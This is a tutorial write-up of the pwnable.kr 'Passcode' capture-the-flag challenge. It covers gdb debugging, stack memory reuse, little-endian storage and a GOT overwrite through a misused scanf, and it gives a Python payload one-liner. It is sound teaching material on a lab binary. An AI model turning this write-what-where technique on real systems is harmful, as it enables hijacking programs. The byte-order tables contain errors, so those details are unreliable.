pwnable.kr (Passcode)
Tutorial Notes
What you’ll learn:
- More sophisticated attacks into memory buffers
- More sophisticated uses of gdb
- Introduction to assembly code
- Closer look at how data is stored in memory
Directions:
First visit pwnable.kr and click on the “Passcode” icon. Next we log in via ssh
as per the instructions:
$ ssh passcode@pwnable.kr -p2222
passcode@pwnable.kr's password:
____ __ __ ____ ____ ____ _ ___ __ _ ____
| \| |__| || \ / || \ | | / _] | |/ ]| \
| o ) | | || _ || o || o )| | / [_ | ' / | D )
| _/| | | || | || || || |___ | _] | \ | /
| | | ` ' || | || _ || O || || [_ __ | \| \
| | \ / | | || | || || || || || . || . \
|__| \_/\_/ |__|__||__|__||_____||_____||_____||__||__|\_||__|\_|
- Site admin : daehee87.kr@gmail.com
- IRC : irc.netgarage.org:6667 / #pwnable.kr
- Simply type "irssi" command to join IRC now
- files under /tmp can be erased anytime. make your directory under /tmp
- to use peda, issue `source /usr/share/peda/peda.py` in gdb terminal
passcode@ubuntu:~$
Next let’s orient ourselves: who are we? what’s in our directory:
passcode@ubuntu:~$ id
uid=1010(passcode) gid=1010(passcode) groups=1010(passcode)
passcode@ubuntu:~$ ls -l
total 16
-r--r----- 1 root passcode_pwn 48 Jun 26 2014 flag
-r-xr-sr-x 1 root passcode_pwn 7485 Jun 26 2014 passcode
-rw-r--r-- 1 root root 858 Jun 26 2014 passcode.c
Once again, the permission for flag are such that only the owner (root) or group (passcode_pwn) can read from it. We can see an executable file passcode
that has curious permissions:
-r-xr-sr-x 1 root passcode_pwn 7485 Jun 26 2014 passcode
This looks similar to the suid
(set user id on execute) permission from the Collision challenge, except the s
is in the group field. This is the guid
or “set group id on execute” permission. When passcode
is run, it will take on group passcode_pwn
. So if we run passcode
, it will have the necessary privilege to access the flag. So now all we need to do is figure out how get it to read from the flag.
Let’s have a look at the passcode.c
file:
#include <stdio.h>
#include <stdlib.h>
void login(){
int passcode1;
int passcode2;
printf("enter passcode1 : ");
scanf("%d", passcode1);
fflush(stdin);
// ha! mommy told me that 32bit is vulnerable to bruteforcing :)
printf("enter passcode2 : ");
scanf("%d", passcode2);
printf("checking...\n");
if(passcode1==338150 && passcode2==13371337){
printf("Login OK!\n");
system("/bin/cat flag");
}
else{
printf("Login Failed!\n");
exit(0);
}
}
void welcome(){
char name[100];
printf("enter you name : ");
scanf("%100s", name);
printf("Welcome %s!\n", name);
}
int main(){
printf("Toddler's Secure Login System 1.0 beta.\n");
welcome();
login();
// something after login...
printf("Now I can safely trust you that you have credential :)\n");
return 0;
}
Let’s start in the main()
function. It calls two function: welcome()
and login()
and then prints a success message. Looking at welcome()
doesn’t seem to reveal much: there’s simple code for you to enter your name, and print it back. In the login()
we see a couple of places to enter a passcode, and then an if
statement checking whether these passcodes equal some predetermined value. If so, the program will print the flag, otherwise the program will exit.
So what’s our strategy? Well, we could try to approach it the same as with the bof
challenge: overrun the bounds of the name
array in the welcome()
function, and see if we can use this to rewrite the passcode1
and passcode2
variables in the login()
function.
As before, it seems like it might be a good strategy to compile our own passcode
binary with debugging information present. First let’s check:
passcode@ubuntu:~$ file passcode
passcode: setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=d2b7bd64f70e46b1b0eb7036b35b24a651c3666b, not stripped
Again we see it’s a 32-bit binary. As before we can create and work out of a temp directory and compile our own version:
passcode@ubuntu:~$ mkdir /tmp/mypasscode && cp passcode.c /tmp/mypasscode && cd /tmp/mypasscode
passcode@ubuntu:/tmp/mypasscode$ gcc -g -m32 passcode.c -o passcode
passcode.c: In function ‘login’:
passcode.c:9:8: warning: format ‘%d’ expects argument of type ‘int *’, but argument 2 has type ‘int’ [-Wformat=]
scanf("%d", passcode1);
^
passcode.c:14:15: warning: format ‘%d’ expects argument of type ‘int *’, but argument 2 has type ‘int’ [-Wformat=]
scanf("%d", passcode2);
^
passcode@ubuntu:/tmp/mypasscode$
Again we see compiler warnings. This could be useful. Let’s make a mental note and revisit this later.
Debugging passcode
Let’s start by running gdb and setting some breakpoints:
passcode@ubuntu:/tmp/mypasscode$ gdb passcode
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.04) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from passcode...done.
(gdb)
If we run list 0
it will print out the source code with corresponding line numbers. Let’s setup some break points, shall we? First let’s maybe setup a breakpoint allowing us to examine the contents of name
after has been written to (line 31):
(gdb) break 31
Breakpoint 1 at 0x804868d: file passcode.c, line 31.
(gdb) break 17
Breakpoint 2 at 0x8048608: file passcode.c, line 17.
Ok let’s run the program.
(gdb) run
Starting program: /tmp/mypasscode/passcode
Toddler's Secure Login System 1.0 beta.
enter you name : abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890
Breakpoint 1, welcome () at passcode.c:31
31 printf("Welcome %s!\n", name);
(gdb) print name
$1 = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890\000\000\000\000\000`m\374\367(\334\377\377\340\336\376\367+`\347\367\000\000\000\000\000`\374\367\000`\374\367(\334\377\377"
Understanding how memory is laid out
Ok so we can see the 100 character array partially filled up with our input. But here’s a question: where is the name
buffer stored in memory? Well we can find out by printing the contents of the pointer to name
as follows:
(gdb) print &name
$2 = (char (*)[100]) 0xffffdba8
Ok, so name
begins at address 0xffffdba8
and goes for 100 bytes. But here’s the next question: which direction does name
get written? Well let’s find out! First let’s print the contents of the memory address 0xffffdba8
. How should we do that? First, take a look at this article on examining memory addresses and data in gdb. We’ll use the x
command (i.e., “examine”) to print 100 characters starting at 0xffffdba8
:
(gdb) x/100c 0xffffdba8
0xffffdba8: 97 'a' 98 'b' 99 'c' 100 'd' 101 'e' 102 'f' 103 'g' 104 'h'
0xffffdbb0: 105 'i' 106 'j' 107 'k' 108 'l' 109 'm' 110 'n' 111 'o' 112 'p'
0xffffdbb8: 113 'q' 114 'r' 115 's' 116 't' 117 'u' 118 'v' 119 'w' 120 'x'
0xffffdbc0: 121 'y' 122 'z' 65 'A' 66 'B' 67 'C' 68 'D' 69 'E' 70 'F'
0xffffdbc8: 71 'G' 72 'H' 73 'I' 74 'J' 75 'K' 76 'L' 77 'M' 78 'N'
0xffffdbd0: 79 'O' 80 'P' 81 'Q' 82 'R' 83 'S' 84 'T' 85 'U' 86 'V'
0xffffdbd8: 87 'W' 88 'X' 89 'Y' 90 'Z' 48 '0' 49 '1' 50 '2' 51 '3'
0xffffdbe0: 52 '4' 53 '5' 54 '6' 55 '7' 56 '8' 57 '9' 48 '0' 0 '\000'
0xffffdbe8: 0 '\000' 0 '\000' 0 '\000' 0 '\000' 96 '`' 109 'm' -4 '\374' -9 '\367'
0xffffdbf0: 40 '(' -36 '\334' -1 '\377' -1 '\377' -32 '\340' -34 '\336' -2 '\376' -9 '\367'
0xffffdbf8: 43 '+' 96 '`' -25 '\347' -9 '\367' 0 '\000' 0 '\000' 0 '\000' 0 '\000'
0xffffdc00: 0 '\000' 96 '`' -4 '\374' -9 '\367' 0 '\000' 96 '`' -4 '\374' -9 '\367'
0xffffdc08: 40 '(' -36 '\334' -1 '\377' -1 '\377'
So from this we can see that the name
buffer grows upward in memory, i.e., each successive byte is stored at the next larger memory address. This means that if name[0]
is stored in address 0xffffdba8
, then name[99]
is stored in address 0xffffdba8
+ 99 = 0xffffdc0b
.
If you’d like to do arithmetic in hexidecimal, you can do it easily with Python:
passcode@ubuntu:/tmp/mypasscode$ python
Python 2.7.12 (default, Jul 1 2016, 15:12:24)
[GCC 5.4.0 20160609] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> x = int("ffffdba8",16) + 99
>>> print hex(x)
0xffffdc0b
So now we have a clear picture how name[]
is laid out in memory:
Memory address Contents Write Direction
-------------- -------- ---------------
... ...
0xffffdc0d <something else>
0xffffdc0c <something else> (High)
0xffffdc0b name[99] ^
0xffffdc0a name[98] / \
0xffffdc09 name[97] |
0xffffdc08 name[96] |
... ... |
0xffffdbab name[3] |
0xffffdbaa name[2] |
0xffffdba9 name[1] |
0xffffdba8 name[0] |
0xffffdba7 <something else> (Low)
0xffffdba6 <something else>
... ...
If you’d like a little memory aid to help you remember, think of the word “writeup.” That is, data is written upwards in memory.
Storing Integers as Little Endian
Character arrays are stored in memory in a straight forward way: each successive character occupies the next higher memory address. But what about integers? The particular architecture found in the passcode
program is something called little endian, meaning the “little end” (i.e., low byte) of the integer gets stored first.
Here’s an illustration of “big end” vs. “little end.”
Decimal 305419896 is hex 0x12345678
Represented as bytes:
The "big end" The "little end"
^ ^
| |
0x12, 0x34, 0x56, 0x78
If an architecture is little endian, the little end gets stored first, which means:
Little endian means little end gets stored first:
0x12, 0x34, 0x56, 0x78
^ ^ ^ ^
| | | | This byte stored 1st
| | | This byte stored 2nd
| | This byte stored 3rd
| This byte stored 4th
The data is still written in an upward direction (i.e., in successively larger addresses). So the first byte is stored gets stored at address n
, the second bytes is stored at the next higher address n+1
, and so on.
We can try this out. Let’s load the integer 0x12345678
into memory starting at address 0xffffdba8
:
(gdb) set {int}0xffffdba8 = 0x12345678
Now let’s examine the memory:
(gdb) x/x 0xffffdba8
0xffffdba8: 0x78
(gdb) x/x 0xffffdba9
0xffffdba9: 0x56
(gdb) x/x 0xffffdbaa
0xffffdbaa: 0x34
(gdb) x/x 0xffffdbab
0xffffdbab: 0x12
So just to visualize this a bit better, the integer 0x12345678
gets stored in memory like this:
Memory address Contents
-------------- --------
... ...
0xffffdbad <something else>
0xffffdbab 0x12
0xffffdbaa 0x34
0xffffdba9 0x56
0xffffdba8 0x78
0xffffdba6 <something else>
... ...
So what? Well recall when we’re writing bytes into buffer, we’re writing from low to high. So if we wanted to write the integer 0x12345678
into memory we’d need to take the little endian-ness into account and order the byte array accordingly:
0x78, 0x56, 0x32, 0x12
Debugging the login()
function
Let’s set a new break point in the login()
function to see where the passcode1
and passcode2
variables are stored in memory. We can set a breakpoint right at the start of the login()
function and then check their memory addresses:
(gdb) break 8
Breakpoint 1 at 0x80485a1: file passcode.c, line 8.
(gdb) run
Starting program: /tmp/mypasscode/passcode
Toddler's Secure Login System 1.0 beta.
enter you name : abc123
Welcome abc123!
Breakpoint 1, login () at passcode.c:8
8 printf("enter passcode1 : ");
(gdb) print &passcode1
$1 = (int *) 0xffffdc08
(gdb) print &passcode2
$2 = (int *) 0xffffdc0c
(gdb)
Well this is interesting. Notice passcode1
begins at 0xffffdc08
. Since it’s an integer, it occupies 4 bytes growing upward in memory, i.e.,
Memory address Contents
-------------- -------
0xffffdc0b passcode1 (greatest byte)
0xffffdc0a passcode1
0xffffdc09 passcode1
0xffffdc08 passcode1 (least byte)
But now recall back to our analysis of the name
buffer in the welcome()
function:
Memory address Contents
-------------- -------
0xffffdc0b name[99]
0xffffdc0a name[98]
0xffffdc09 name[97]
0xffffdc08 name[96]
Interesting! The last 4 bytes of name
overlap with passcode1
.
Huh? How does that work? Well name
and passcode1
are local variables living in two separate functions. Local variables are only allocated when the function is called. So by the time passcode1
is allocated, the name
variable is no longer being used, and passcode1
essentially by coincidence got allocated to a region of memory that name
had used previously.
So here’s another question: if we set the addresses 0xffffdc08-0b
during the welcome()
function, would those values still be there when the login
function is called? Well let’s check. Let’s try entering a name consisting of 96 “.”s followed by “ABCD”. Then we’ll examine the contents of passcode1
using x/c
, which tells gdb to print the memory contents as characters:
(gdb) run
Starting program: /tmp/mypasscode/passcode
Toddler's Secure Login System 1.0 beta.
enter you name : ................................................................................................ABCD
Welcome ................................................................................................ABCD!
Breakpoint 2, login () at passcode.c:8
8 printf("enter passcode1 : ");
(gdb) x/c 0xffffdc08
0xffffdc08: 65 'A'
(gdb) x/c 0xffffdc09
0xffffdc09: 66 'B'
(gdb) x/c 0xffffdc0a
0xffffdc0a: 67 'C'
(gdb) x/c 0xffffdc0b
0xffffdc0b: 68 'D'
(gdb)
Bingo! We can control the contents of passcode1
at the time the login()
function is called.
The mistake here (well, one of the mistakes) is the programmer didn’t initialize passcode1
, so whatever was living in memory from before just gets left there. Ok, this will be useful.
That Compiler Warning about scanf()
Recall back to when we compile the program, we received that compiler warning:
passcode.c:9:8: warning: format ‘%d’ expects argument of type ‘int *’, but argument 2 has type ‘int’ [-Wformat=]
scanf("%d", passcode1);
Let’s go look up what’s going on here. The scanf()
function is accepting input from standard in. To understand this, you need to understand a bit about how pointers work.
First let’s see an example of how scanf
reads an integer from standard in:
scanf ("%d", <address>)
The scanf
tells the program to read bytes from standard input, interpret them in some specified format, and then store them somewhere in memory.
The %d
tells the program to interpret the input as a signed integer, i.e., read an ASCII numeric value from standard in, interpret it as a 4 byte integer, and store it at the address specified by <address>
.
Using scanf
properly
So how do you specify an address? Well first we would allocate an integer in memory, and then point scanf
to that location. Here’s an example of how to do it properly:
int i;
printf ("Enter your age: ");
scanf ("%d", &i);
The &i
tells the program to lookup the memory address of integer i
using the address-of operator &
, and then write the 4 input bytes to memory beginning at that address.
Using scanf
improperly
Look what happens in login()
, however:
printf("enter passcode1 : ");
scanf("%d", passcode1);
The programmer has made a mistake. Recall scanf()
will write the input to whatever address you give it. The correct action would be to lookup the address of passcode1
using &passcode1
, i.e.,
scanf("%d", &passcode1);
But the programmer forgot the address-of
operator. So instead of giving scanf
the location of passcode1
, you’re giving it the contents of passcode1
!
But scanf
is a dumb function… it’s going to write to whatever address you give it, so it’s going to treat the contents of passcode1
as the address to write to!
So as the attacker, if we could set the content of passcode1
, we could make the program write an integer anywhere we want!
In summary
So to summarize what we have so far:
- The
name
buffer overlaps withpasscode1
allowing to write intopasscode1
- The programmer forgot to initialize
passcode1
allowing us to control the contents ofpasscode
- The programmer improperly instructs
scanf
to store bytes from standard input into the address pointed to by the contents ofpasscode1
Since we control the contents of passcode1
we can write an integer into any memory location we want (well.. with some constraints).
Hijacking a function call
Question: if you could write 4 bytes anywhere in memory, where would you write? What would you write? Well recall 4 bytes is enough to specify a memory address. So the “what” could be an address.
The next piece of the puzzle is to understand what happens when a function gets called. There’s a fair bit of detail here, but we’ll just skip to the part that’s relevant to us: when a function is called, the program has to jump to a location in memory containing the function’s code. That means a function call must specify an address to jump to. So if we could overwrite that address, we could cause the program to jump to anywhere we want and continue executing!
So what if we just jumped straight to the system call, bypassing the if
statement all together? Let’s take a look.
For this we can use the disassemble
command in gdb to disassemble the login
function and see the memory addresses are associated with various operations:
(gdb) disassemble login
Dump of assembler code for function login:
0x0804859b <+0>: push %ebp
.
.
.
0x0804862d <+146>: push $0x80487bf
0x08048632 <+151>: call 0x8048450 <system@plt>
.
.
.
So if we could somehow cause the program to jump to address 0x0804862d
, the next instruction to be executed would be the system call that would print the flag!
So which function call shall we hijack? Returning to the code, the operation immediately after the scanf
is a function called fflush
:
printf("enter passcode1 : ");
scanf("%d", passcode1);
fflush(stdin);
So we could use the scanf
to overwrite the address pointing to the start of the fflush
code, causing the program to jump to the system call instead. Let’s disassemble fflush
and see. Note the program should be halted (i.e., not paused at a breakpoint) when you do this:
(gdb) disassemble fflush
Dump of assembler code for function fflush@plt:
0x08048420 <+0>: jmp *0x804a010
0x08048426 <+6>: push $0x8
0x0804842b <+11>: jmp 0x8048400
End of assembler dump.
So the first instruction is jmp *0x804a010
. The jmp
instruction tells the program to jump to an address to continue execution. In this case the program will jump to the location of the fflush
code and execute it.
So which address does it jump to? The “*” is called the indirection operator *0x804a010
is explained as the “address pointed to by 0x804a010
”. In other words, go grab the 4 bytes stored in memory at addresses 0x804a010-0x804a013
, and then jump to that address.
Ok, now we got it. We need to overwrite the contents in addresses 0x804a010-0x804a013
with the address of the system call. When the program loads the address to run the fflush
code, it will instead load the address of the system call, and jump to that instead.
Recall the system call happens at address 0x0804862d
, so our goal to write the following contents to memory:
Memory address Contents
-------------- -------
0x804a013 0x32
0x804a012 0x86
0x804a011 0x04
0x804a010 0x08
In Summary
When the program calls fflush
, it goes and grabs the 4 bytes starting at 0x804a010
. Normally this would cause the program to jump to the location of the fflush
instructions. But we’ve rewritten the memory contents to the address of the system call. So when the program tries to jump to the fflush
instructions, it will jump to the system call instead, which will print the flag.
Putting it all together
In summary we have 3 parts to our exploit:
- Filling the buffer enough to write into
passcode1
- Filling
passcode1
with the value0x804a010
soscanf
will store input to that address - Filling address
0x804a010
with the address0x0804862d
so thefflush
will jump to the system call printing the flag.
So as input into the program we need:
- 96 characters of filler (it doesn’t matter). Just enough bytes so we can set the last 4 bytes. Python makes it easy to generate a string of 96 characters:
96 * '.'
- The the address into which we can store the address to be jumped to, i.e., the bytes
0x08, 0x04, 0xa0, 0x10
in little endian. In Python this would be:
\x10\xa0\x04\x08
- The address to jump to, i.e.
0x0804862d
. This value however must be delivered as an ASCII encoded decimal number, since thescanf()
function is expecting the user to type it in. Let’s convert0x0804862d
to decimal. Using the Python interpreter we get:
>>> int("0804862d",16)
134514221
Putting this all together we have the Python command:
print 96 * '.' + '\x10\xa0\x04\x08' + '134514221'
Ok, let’s input this into passcode
:
passcode@ubuntu:/tmp/mypasscode$ python -c "print 96 * '.' + '\x10\xa0\x04\x08' + '134514221'" | ./passcode
Toddler's Secure Login System 1.0 beta.
enter you name : Welcome ................................................................................................!
/bin/cat: flag: No such file or directory
enter passcode1 : Now I can safely trust you that you have credential :)
It worked! But it didn’t print the flag (it says No such file or directory
). That’s because we ran it on the version in /tmp/mypasscode
. Now we need to run it on the real version in /home/passcode
:
passcode@ubuntu:~$ cd /home/passcode
passcode@ubuntu:~$ python -c "print 96 * '.' + '\x10\xa0\x04\x08' + '134514221'" | ./passcode
Toddler's Secure Login System 1.0 beta.
enter you name : Welcome ................................................................................................!
enter passcode1 : enter passcode2 : checking...
Login Failed!
Hmm. This time it didn’t work. The specific memory addresses for the fflush
call and the system
call must be different.
GOAL: Your job is to disassemble the real passcode
file and figure out what the correct addresses are, and then capture the flag!